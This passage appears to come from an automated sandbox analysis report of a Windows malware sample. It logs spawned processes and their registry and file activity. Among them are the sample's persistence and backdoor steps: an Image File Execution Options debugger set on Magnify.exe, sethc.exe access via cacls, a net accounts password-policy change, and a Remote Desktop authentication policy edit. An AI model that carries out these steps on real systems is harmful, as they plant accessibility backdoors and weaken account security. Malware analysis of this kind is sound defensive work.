"\\Device\\NamedPipe\\",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor"
],
"file_exists": [
"C:\\Users\\cuck\\AppData\\Local\\Temp"
],
"command_line": [
"Find \"=\"",
"WMIC Group Where \"SID = 'S-1-5-32-544'\" Get Name \/Value "
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DefaultColor",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\AutoRun",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DelayedExpansion",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DisableUNCCheck",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\EnableExtensions",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\CompletionChar",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\EnableExtensions",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\PathCompletionChar",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\PathCompletionChar",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\DisableUNCCheck",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DelayedExpansion",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\AutoRun",
"HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\\DefaultColor",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Command Processor\\CompletionChar"
],
"directory_enumerated": [
"C:\\Users\\cuck\\AppData\\Local\\Temp\\WMIC.*",
"C:\\Users\\cuck\\AppData",
"C:\\Windows\\System32\\wbem\\WMIC.COM",
"C:\\Users\\cuck\\AppData\\Local\\Temp",
"C:\\Windows\\System32\\WMIC",
"C:\\Windows\\System32\\WMIC.*",
"C:\\Windows\\System32\\wbem\\WMIC.exe",
"C:\\Python27\\Scripts\\Find",
"C:\\Python27\\Find.*",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Find",
"C:\\Python27\\Scripts\\WMIC.*",
"C:\\Users\\cuck\\AppData\\Local",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\Find.*",
"C:\\Windows\\System32\\find.exe",
"C:\\Users",
"C:\\Windows\\System32\\Find.*",
"C:\\Python27\\Scripts\\Find.*",
"C:\\Windows\\System32\\find.COM",
"C:\\Windows\\WMIC.*",
"C:\\Python27\\Find",
"C:\\Users\\cuck",
"C:\\Windows\\System32\\wbem\\WMIC.*",
"C:\\Windows\\WMIC",
"C:\\Users\\cuck\\AppData\\Local\\Temp\\WMIC",
"C:\\Python27\\WMIC.*",
"C:\\Python27\\WMIC",
"C:\\Python27\\Scripts\\WMIC"
]
},
"first_seen": 1574704386.25,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 3272,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\debugger"
]
},
"first_seen": 1574704392.499876,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 3788,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\{00000000-0000-0000-0000-000000000000}"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\{00000000-0000-0000-0000-000000000000}\\EndTimeLo",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\State\\Machine\\Extension-List\\{00000000-0000-0000-0000-000000000000}\\EndTimeLo"
]
},
"first_seen": 1574704404.843626,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\attrib.exe",
"process_name": "attrib.exe",
"pid": 4300,
"summary": {
"file_opened": [
"C:\\Users\\ontar"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles"
],
"directory_enumerated": [
"C:\\Users\\ontar",
"C:\\Users"
]
},
"first_seen": 1574704406.390499,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 3792,
"summary": {
"file_opened": [
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SFCDisable",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
]
},
"first_seen": 1574704394.187374,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\net1.exe",
"process_name": "net1.exe",
"pid": 3876,
"summary": {
"dll_loaded": [
"rpcrt4.dll",
"NETMSG",
"SAMLIB.dll",
"RPCRT4.dll"
],
"file_opened": [
"\\\\?\\PIPE\\lsarpc",
"\\\\?\\PIPE\\samr"
],
"regkey_opened": [
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Rpc",
"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\Rpc"
],
"file_written": [
"\\\\?\\PIPE\\lsarpc",
"\\\\?\\PIPE\\samr"
],
"file_read": [
"\\\\?\\PIPE\\lsarpc",
"\\\\?\\PIPE\\samr"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Rpc\\MaxRpcSize",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SystemSetupInProgress",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\CEIPEnable",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\OOBEInProgress",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\ComputerName\\ActiveComputerName\\ComputerName",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
]
},
"first_seen": 1574704390.562374,
"ppid": 3832
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 3808,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\Status\\GPExtensions\\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\Status\\GPExtensions\\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\\LastPolicyTime",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\Status\\GPExtensions\\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\\LastPolicyTime"
]
},
"first_seen": 1574704405.202999,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\net1.exe",
"process_name": "net1.exe",
"pid": 3300,
"summary": {
"dll_loaded": [
"rpcrt4.dll",
"NETMSG",
"SAMLIB.dll",
"RPCRT4.dll"
],
"file_opened": [
"\\\\?\\PIPE\\lsarpc",
"\\\\?\\PIPE\\samr"
],
"regkey_opened": [
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Rpc",
"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\Rpc"
],
"file_written": [
"\\\\?\\PIPE\\lsarpc",
"\\\\?\\PIPE\\samr"
],
"file_read": [
"\\\\?\\PIPE\\lsarpc",
"\\\\?\\PIPE\\samr"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Rpc\\MaxRpcSize",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SystemSetupInProgress",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\CEIPEnable",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\OOBEInProgress",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\ComputerName\\ActiveComputerName\\ComputerName",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
]
},
"first_seen": 1574704392.843626,
"ppid": 3348
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 3816,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\\UserAuthentication",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services\\UserAuthentication"
]
},
"first_seen": 1574704405.390499,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\find.exe",
"process_name": "find.exe",
"pid": 2284,
"summary": {
"file_opened": [
"C:\\Windows\\System32\\en-US\\ulib.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles"
],
"dll_loaded": [
"kernel32.dll"
]
},
"first_seen": 1574704386.5,
"ppid": 2244
},
{
"process_path": "C:\\Windows\\SysWOW64\\sc.exe",
"process_name": "sc.exe",
"pid": 3824,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\sc.exe.mui"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY"
]
},
"first_seen": 1574704394.390499,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 2344,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\debugger",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\debugger"
]
},
"first_seen": 1574704388.296751,
"ppid": 2988
},
{
"process_path": "C:\\Windows\\SysWOW64\\net1.exe",
"process_name": "net1.exe",
"pid": 3828,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"API-MS-WIN-Service-Management-L1-1-0.dll",
"NETMSG",
"API-MS-WIN-Service-winsvc-L1-1-0.dll"
]
},
"first_seen": 1574704401.171751,
"ppid": 2728
},
{
"process_path": "C:\\Windows\\SysWOW64\\net.exe",
"process_name": "net.exe",
"pid": 3832,
"summary": {
"command_line": [
"C:\\Windows\\system32\\net1 accounts \/forcelogoff:no \/maxpwage:unlimited"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
]
},
"first_seen": 1574704390.406124,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\net1.exe",
"process_name": "net1.exe",
"pid": 4052,
"summary": {
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"API-MS-WIN-Service-Management-L1-1-0.dll",
"NETMSG",
"API-MS-WIN-Service-winsvc-L1-1-0.dll"
]
},
"first_seen": 1574704395.109249,
"ppid": 3940
},
{
"process_path": "C:\\Windows\\SysWOW64\\cacls.exe",
"process_name": "cacls.exe",
"pid": 3332,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\cacls.exe.mui",
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"directory_enumerated": [
"C:\\Windows\\System32\\dllcache\\sethc.exe"
],
"regkey_opened": [
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Rpc",
"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\Rpc"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Locale\\00000409",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Rpc\\MaxRpcSize",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\SystemSetupInProgress",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language Groups\\1",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\CEIPEnable",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\OOBEInProgress",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\ComputerName\\ActiveComputerName\\ComputerName",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type"
],
"dll_loaded": [
"API-MS-Win-Security-LSALookup-L1-1-0.dll",
"kernel32.dll",
"rpcrt4.dll"
]
},
"first_seen": 1574704389.124876,
"ppid": 2988
},
{
"process_path": "C:\\Windows\\SysWOW64\\sc.exe",
"process_name": "sc.exe",
"pid": 3860,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\sc.exe.mui"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY"
]
},
"first_seen": 1574704399.984249,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\find.exe",
"process_name": "find.exe",
"pid": 1820,
"summary": {
"file_opened": [
"C:\\Windows\\System32\\en-US\\ulib.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles"
],
"dll_loaded": [
"kernel32.dll"
]
},
"first_seen": 1574704388.077999,
"ppid": 2736
},
{
"process_path": "C:\\Windows\\SysWOW64\\timeout.exe",
"process_name": "timeout.exe",
"pid": 3364,
"summary": {
"file_opened": [
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
]
},
"first_seen": 1574704396.718626,
"ppid": 1432
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 2856,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
